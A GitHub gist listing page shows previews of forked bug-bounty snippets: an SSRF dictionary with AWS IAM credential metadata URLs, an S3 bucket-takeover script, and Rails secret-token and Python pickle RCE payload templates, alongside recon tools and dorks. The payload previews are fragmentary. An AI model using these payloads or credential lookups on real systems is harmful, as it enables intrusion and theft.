- https://scans.io/
- https://commoncrawl.org/
- https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
- https://www.shodan.io/
- https://opendata.rapid7.com/
- https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
- https://securitytrails.com/
- https://threatcrowd.org/
- https://dnsdumpster.com/
- https://crt.sh/
Dipak Kumar Das d1pakda5
💻
d1pakda5
/ bucket-takeover.sh
Created
February 15, 2018 12:48
— forked from random-robbie/bucket-takeover.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| aws s3api create-bucket --bucket $1 --acl public-read --region us-east-1 | |
| aws s3api put-bucket-website --bucket $1 --website-configuration file://redirect.jso |
d1pakda5
/ cloud_metadata.txt
Created
April 25, 2018 19:06
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
d1pakda5
/ a-recon-services-list-for-liveoverflow.md
Created
July 16, 2018 12:45
— forked from EdOverflow/a-recon-services-list-for-liveoverflow.md
d1pakda5
/ rails-secret-token-rce.rb
Created
July 20, 2018 19:51
— forked from rootxharsh/rails-secret-token-rce.rb
Rails Secret Token RCE.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
| require 'base64' | |
| require 'openssl' | |
| require 'optparse' | |
| require 'open-uri' | |
| SECRET_TOKEN = "SECRET HERE" | |
| code = "eval('`COMMAND HERE`')" | |
| marshal_payload = Base64.encode64( | |
| "\x04\x08" + | |
| "o" + |
d1pakda5
/ waybackurls.py
Created
July 26, 2018 09:55
— forked from mhmdiaa/waybackurls.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
d1pakda5
/ http-components.csv
Created
August 12, 2018 10:47
— forked from achillean/http-components.csv
Sample output from the Shodan CLI running: shodan stats --facets http.component:100,port:20 http-components http
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Query | http | |||
|---|---|---|---|---|
| http.component | port | |||
| jQuery | 1250676 | 80 | 56553138 | |
| Zepto | 483672 | 7547 | 50655465 | |
| PHP | 266668 | 443 | 26476433 | |
| Twitter Bootstrap | 255045 | 4567 | 11633390 | |
| Google Font API | 211921 | 8080 | 8631875 | |
| WordPress | 139645 | 1900 | 4540344 | |
| Font Awesome | 133483 | 49152 | 3028740 |
d1pakda5
/ bug bounty monitor - assetnote installation
Created
August 31, 2018 12:30
— forked from sz3n/bug bounty monitor - assetnote installation
bug bounty monitor - assetnote installation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Assetnote is a new subdomains supervision tools which allow for real-time notifications about | |
| newlly added subdomains | |
| The tool is especially usefull for bug bounty | |
| As I'm starting playing in bug bounties the tool seems extremelly apealing | |
| The project can be found at https://github.com/infosec-au/assetnote | |
| # installation # | |
| /** My VPS is runing Ubuntu LTS 14.04 **/ |
d1pakda5
/ Google_dorks
Created
October 15, 2018 12:19
— forked from zbetcheckin/Google_dorks
Some google dorks useful in footprinting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Replace 'X' with the domain name of your choice | |
| # Back link | |
| link:X -site:X | |
| # Sub domain | |
| site:X -site:www.X | |
| # Url | |
| inurl:X -site:X |
d1pakda5
/ pickle-payload.py
Created
December 20, 2018 07:32
— forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Pickle deserialization RCE payload. | |
| # To be invoked with command to execute at it's first parameter. | |
| # Otherwise, the default one will be used. | |
| # | |
| import cPickle | |
| import sys | |
| import base64 |
d1pakda5
/ scan.py
Created
February 6, 2019 06:38
— forked from rudrasingh99/scan.py
Scan multiple platform for hosts.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| import requests | |
| import re , os | |
| from shodan import Shodan | |
| datalist = [] | |
| class Binaryhost(): | |
OlderNewer